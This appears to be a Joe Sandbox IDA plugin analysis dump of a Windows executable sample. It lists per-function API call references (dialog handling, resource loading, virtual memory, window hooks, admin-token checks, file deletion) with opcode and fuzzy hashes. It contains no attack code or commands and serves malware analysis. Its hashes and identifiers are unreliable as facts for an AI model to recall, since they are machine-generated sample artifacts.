                                              • SetFileTime.KERNELBASE(?,?,?,?,004124A9,00000000,00000000,?,004012DC,?), ref: 0041248D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: FileTime
                                              • String ID:
                                              • API String ID: 1425588814-0
                                              • Opcode ID: a76d94471d75101d3d19dad7ac3713a68ec5cb13f5505408d5a5f3094a28fb24
                                              • Instruction ID: f7402770b179a49de0ab9fe0b192ea54849ac29a58fff8f6d7b1295910a8291e
                                              • Opcode Fuzzy Hash: a76d94471d75101d3d19dad7ac3713a68ec5cb13f5505408d5a5f3094a28fb24
                                              • Instruction Fuzzy Hash: 31C04C36159105FF8F020F70CC04C1ABFA2AB99311F10CA18B155C4074C7328034EB12
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??2@
                                              • String ID:
                                              • API String ID: 1033339047-0
                                              • Opcode ID: 3a0bd8ffb75a7d0c1b376548dc289f793da2ad7584b55b5230689940060f599c
                                              • Instruction ID: 576c3123db9d42ad6f26370305c4fe05627a80a4f610c37a806172f0a9a2cc4a
                                              • Opcode Fuzzy Hash: 3a0bd8ffb75a7d0c1b376548dc289f793da2ad7584b55b5230689940060f599c
                                              • Instruction Fuzzy Hash: C5318271910115ABDB10EFE5CC84CEFB7B8EF48344B15087BE441B72A1D7799E818B69
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??2@
                                              • String ID:
                                              • API String ID: 1033339047-0
                                              • Opcode ID: 6debaf52b1a4c8e37dc45691c4e1b6b73fa31808f858abb765b60bcf64e2121f
                                              • Instruction ID: 8d352c1c46fd1df2ac59e7115e7018534418c9226e76046c12a2ea9475f01b4a
                                              • Opcode Fuzzy Hash: 6debaf52b1a4c8e37dc45691c4e1b6b73fa31808f858abb765b60bcf64e2121f
                                              • Instruction Fuzzy Hash: 3F21C3717142869BCF34FF658A904EB7395AF40314B14462FE482D3201C7B8ADE5CB5E
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??2@
                                              • String ID:
                                              • API String ID: 1033339047-0
                                              • Opcode ID: ac816b6ef2abf4182fe3fab88150d6e7fb7849f17cb6b15ec7980f19aa18face
                                              • Instruction ID: 1b5e1ee4d6878524e1e94f3eb7038bf21a854c21e9593a8af651c0b03c199f54
                                              • Opcode Fuzzy Hash: ac816b6ef2abf4182fe3fab88150d6e7fb7849f17cb6b15ec7980f19aa18face
                                              • Instruction Fuzzy Hash: FED0A9312082203AEA5862320C119AF08884F40329B008C3FB802E62D1DE3ECE81429E
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,004133A4,?,?,?,0040C03F,?), ref: 00402A4B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: d52152f8240d310394afd4d808f8c2102ad5bdb202a27d84af0ad2d18dcc3f18
                                              • Instruction ID: 5872fe86412dcdd468f52b7ecb5979782df8fbe157f8593837c634c381a8cb4c
                                              • Opcode Fuzzy Hash: d52152f8240d310394afd4d808f8c2102ad5bdb202a27d84af0ad2d18dcc3f18
                                              • Instruction Fuzzy Hash: 5FC08C703483007AEE211B748F0BB4B3653AF84B16F90C029F348B40E0CBF58410AA0A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??2@
                                              • String ID:
                                              • API String ID: 1033339047-0
                                              • Opcode ID: 60ec2abcf5a6396ef8d7bbb53f790590f8d628139c26fe78cb856bdba3517ae4
                                              • Instruction ID: 3495fa19a298e49cc2800c4131356790e1569378de7ddbf050defd7ea7821dd7
                                              • Opcode Fuzzy Hash: 60ec2abcf5a6396ef8d7bbb53f790590f8d628139c26fe78cb856bdba3517ae4
                                              • Instruction Fuzzy Hash: 40B012E474010671AE4420721F132EF20C007D1385F0408B7AA07E42C2FEDCCAE5912F
                                              APIs
                                              • VirtualFree.KERNELBASE(?,00000000,00008000,00413333,00000000,?,0041339B,?,?,0040C03F,?), ref: 00402002
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: FreeVirtual
                                              • String ID:
                                              • API String ID: 1263568516-0
                                              • Opcode ID: ef87b2e52dde92dd11102c14b5a17c3afe989afc729bbcebbe3bdea788540431
                                              • Instruction ID: 703a6ff84afb8074b9885b8fa9c0ccab1db7962bc4b9572073b4c9a6fb1bc3a6
                                              • Opcode Fuzzy Hash: ef87b2e52dde92dd11102c14b5a17c3afe989afc729bbcebbe3bdea788540431
                                              • Instruction Fuzzy Hash: 8DB09230285700BAEF224B00DE0DB4A76A0BB80B06F24C428B288240E087B86818DA0E
                                              APIs
                                                • Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
                                                • Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961
                                              • GetDlgItem.USER32(?,000004B8), ref: 004092EE
                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004092FD
                                              • GetDlgItem.USER32(?,000004B5), ref: 00409344
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00409349
                                              • GetDlgItem.USER32(?,000004B5), ref: 00409359
                                              • SetWindowLongW.USER32(00000000), ref: 0040935C
                                              • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 00409382
                                              • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00409394
                                              • GetDlgItem.USER32(?,000004B4), ref: 0040939E
                                              • SetFocus.USER32(00000000), ref: 004093A1
                                              • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004093D0
                                              • CoCreateInstance.OLE32(0041C464,00000000,00000001,0041BD6C,?), ref: 004093F4
                                              • GetDlgItem.USER32(?,00000002), ref: 00409411
                                              • IsWindow.USER32(00000000), ref: 00409414
                                              • GetDlgItem.USER32(?,00000002), ref: 00409424
                                              • EnableWindow.USER32(00000000), ref: 00409427
                                              • GetDlgItem.USER32(?,000004B5), ref: 0040943B
                                              • ShowWindow.USER32(00000000), ref: 0040943E
                                                • Part of subcall function 0040819E: GetDlgItem.USER32(?,000004B6), ref: 004081AC
                                                • Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409240), ref: 00408E9F
                                                • Part of subcall function 00408E76: LoadIconW.USER32(00000000), ref: 00408EA2
                                                • Part of subcall function 00408E76: GetSystemMetrics.USER32(00000032), ref: 00408EB6
                                                • Part of subcall function 00408E76: GetSystemMetrics.USER32(00000031), ref: 00408EBB
                                                • Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409240), ref: 00408EC4
                                                • Part of subcall function 00408E76: LoadImageW.USER32(00000000), ref: 00408EC7
                                                • Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EE7
                                                • Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408EF0
                                                • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F0C
                                                • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F16
                                                • Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F22
                                                • Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F31
                                                • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F3F
                                                • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F4D
                                                • Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F59
                                                • Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F68
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: Item$Window$Long$MessageSendSystem$EnableHandleLoadMenuMetricsModuleShow$CreateFocusIconImageInstanceTimer
                                              • String ID:
                                              • API String ID: 1057135554-0
                                              • Opcode ID: ba3a8e7896f853d1d8996d9c4767784286a57f8b05f592c4c5be814e68872b41
                                              • Instruction ID: 5db8082ad3932120c1d3ad580c4d4a8d12b10d7a787853330903dc21ac74032f
                                              • Opcode Fuzzy Hash: ba3a8e7896f853d1d8996d9c4767784286a57f8b05f592c4c5be814e68872b41
                                              • Instruction Fuzzy Hash: E54184B0605708AFDA246F22DD49F6B7B9DFF44B04F00843EF955A62E1CB79A850CA1D
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004020CA
                                              • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 004020E7
                                              • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 004020FB
                                              • SizeofResource.KERNEL32(00000000,00000000), ref: 0040210C
                                              • LoadResource.KERNEL32(00000000,00000000), ref: 00402116
                                              • LockResource.KERNEL32(00000000), ref: 00402121
                                              • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 0040214D
                                              • GetProcAddress.KERNEL32(00000000), ref: 00402156
                                              • wsprintfW.USER32 ref: 00402175
                                              • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 0040218A
                                              • GetProcAddress.KERNEL32(00000000), ref: 0040218D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                              • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                              • API String ID: 2639302590-365843014
                                              • Opcode ID: 4509f4e0e8980c838efd414ca7c3a82435c9d4736e02e482c88f6a1a6bb26b48
                                              • Instruction ID: 092f3855134823e072dda954e94301c8fdf66ebe7b0f0e4b82829ee13f00460f
                                              • Opcode Fuzzy Hash: 4509f4e0e8980c838efd414ca7c3a82435c9d4736e02e482c88f6a1a6bb26b48
                                              • Instruction Fuzzy Hash: 7C21B0B5941308BBDB119BA59C08F9B3ABCEB44711F108422FA04E72D0D6B8CD108BA9
                                              APIs
                                              • wvsprintfW.USER32(?,00000000,?), ref: 0040962A
                                              • GetLastError.KERNEL32 ref: 0040963B
                                              • FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
                                              • lstrlenW.KERNEL32(?), ref: 0040968B
                                              • lstrlenW.KERNEL32(?), ref: 00409692
                                              • ??2@YAPAXI@Z.MSVCRT ref: 004096A7
                                              • lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
                                              • lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004096D7
                                              • LocalFree.KERNEL32(?), ref: 004096E1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                              • String ID:
                                              • API String ID: 829399097-0
                                              • Opcode ID: 6755fbfc951f38e1e7f803b5e68f2ede9986d1e01f79489cefcbe200c2021727
                                              • Instruction ID: 0f5aa2174aa9d056a6dafd0f9c7aa592ac4ad2a583e4ab7749965f253d727b0f
                                              • Opcode Fuzzy Hash: 6755fbfc951f38e1e7f803b5e68f2ede9986d1e01f79489cefcbe200c2021727
                                              • Instruction Fuzzy Hash: F0216176800108FFDB159FA1DC85DEB7BACEF08354B10847BF946A6191EA359E84CBA4
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,0041A68C,?,?,?,00000000), ref: 0040320B
                                              • lstrcmpW.KERNEL32(?,0041A688,?,0000005C,?,?,?,00000000), ref: 0040325E
                                              • lstrcmpW.KERNEL32(?,0041A680,?,?,00000000), ref: 00403274
                                              • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 0040328A
                                              • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00403291
                                              • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 004032A3
                                              • FindClose.KERNEL32(00000000,?,?,00000000), ref: 004032B2
                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 004032BD
                                              • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 004032C6
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004032D1
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004032DC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                              • String ID:
                                              • API String ID: 1862581289-0
                                              • Opcode ID: d0a5d61d4e970fa2e12ee4e43d613ab26048e5a8235c629d0d05804913e14dc8
                                              • Instruction ID: 78ea6f58b6c007c21ca8543ec41bf80dc5d167b0896979d67dadc0a8fcb0d376
                                              • Opcode Fuzzy Hash: d0a5d61d4e970fa2e12ee4e43d613ab26048e5a8235c629d0d05804913e14dc8
                                              • Instruction Fuzzy Hash: 86216131601208BADB11AF61EC59EFE3B7CAF44746F1444BAF405B21D1EB389B45CA69
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00408DDA
                                              • SetWindowsHookExW.USER32(00000007,Function_00008D01,00000000,00000000), ref: 00408DE5
                                              • GetCurrentThreadId.KERNEL32 ref: 00408DF4
                                              • SetWindowsHookExW.USER32(00000002,Function_00008D8D,00000000,00000000), ref: 00408DFF
                                              • EndDialog.USER32(?,00000000), ref: 00408E25
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: CurrentHookThreadWindows$Dialog
                                              • String ID:
                                              • API String ID: 1967849563-0
                                              • Opcode ID: 64107a2dc15b1d7316d888ad8cd960e682b3da45f1fa61c15e116e140322c59e
                                              • Instruction ID: b9e6956ff065cd05f2df324d2b5f6df6e8dcd0ec849c0deb45459710c318944d
                                              • Opcode Fuzzy Hash: 64107a2dc15b1d7316d888ad8cd960e682b3da45f1fa61c15e116e140322c59e
                                              • Instruction Fuzzy Hash: 51012671201218DFD2106F57ED44AB2F3ECEF54395B01843FE606D29A0CBB758008F69
                                              APIs
                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,004066A7,?,?,?,?,004066A7), ref: 0040277D
                                              • CheckTokenMembership.ADVAPI32(00000000,004066A7,?,?,?,?,004066A7,00000000,?,?), ref: 0040278F
                                              • FreeSid.ADVAPI32(004066A7,?,?,?,004066A7,00000000,?,?), ref: 00402798
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                              • String ID:
                                              • API String ID: 3429775523-0
                                              • Opcode ID: 65cc84debf9a599d2aa76ae24c15b7a3b387b9e5edbe49ca06617e6efb59e37b
                                              • Instruction ID: 8fcaf4468ec200eb9195fd6454b881e9af9bec8ea6f7a7215fc0dea95779660d
                                              • Opcode Fuzzy Hash: 65cc84debf9a599d2aa76ae24c15b7a3b387b9e5edbe49ca06617e6efb59e37b
                                              • Instruction Fuzzy Hash: 44F03176945248FEDB01DFE88D85ADDBF7CAB18200F4480AAE105A3182D2705714CB29
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 70cc6543f89a80714e3e390a279f58e7cec3ea9652c2d41397cab368ec3e5f33
                                              • Instruction ID: c7f49ce94350c58bf9a178907c982dec7311dfba9986166f982fc986de3302c0
                                              • Opcode Fuzzy Hash: 70cc6543f89a80714e3e390a279f58e7cec3ea9652c2d41397cab368ec3e5f33
                                              • Instruction Fuzzy Hash: E361B671A147019BC728DF78C4A16EBF7E0BF40308F440A2FD58A9BA81D739B549C795
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: SetEnvironment
                                              • API String ID: 0-360490078
                                              • Opcode ID: c7bfdb3e15d592c1de232d933842c4ab9efd31f480a5751ca1ce541d06df7cb1
                                              • Instruction ID: a70ae2ba77342e2fa0442e9f712db7fa661bebf9b46ff7160e2a4c09fbd55f3e
                                              • Opcode Fuzzy Hash: c7bfdb3e15d592c1de232d933842c4ab9efd31f480a5751ca1ce541d06df7cb1
                                              • Instruction Fuzzy Hash: AF71126610DBD08FC3228B3D9C95265BFE1AEA3105B4D8ACDC0E64BB93D426E10CDB75
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: A
                                              • API String ID: 0-2078354741
                                              • Opcode ID: cab503b8d0af9376babe026cf16f77c57ae0b2221e255354d54cb8a8048025ec
                                              • Instruction ID: 83c227925f6feaddc60b1c5dc2dd2bb0d1016e3deb83b34307da0ad7d07c5c6c
                                              • Opcode Fuzzy Hash: cab503b8d0af9376babe026cf16f77c57ae0b2221e255354d54cb8a8048025ec
                                              • Instruction Fuzzy Hash: B5615A725087118FC318DF49D48494AF3E1FFC8318F1A8A6DEA885B361D771E959CB86
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
                                              • Instruction ID: 8cec78a6a68e099a16e582f3a8e71d5628037794c160d545261e982a803351c6
                                              • Opcode Fuzzy Hash: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
                                              • Instruction Fuzzy Hash: 02022E72A042118BD71CCE28C59027DBBE2FBC4344F150A3FE89667BD4D6789958CB9A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
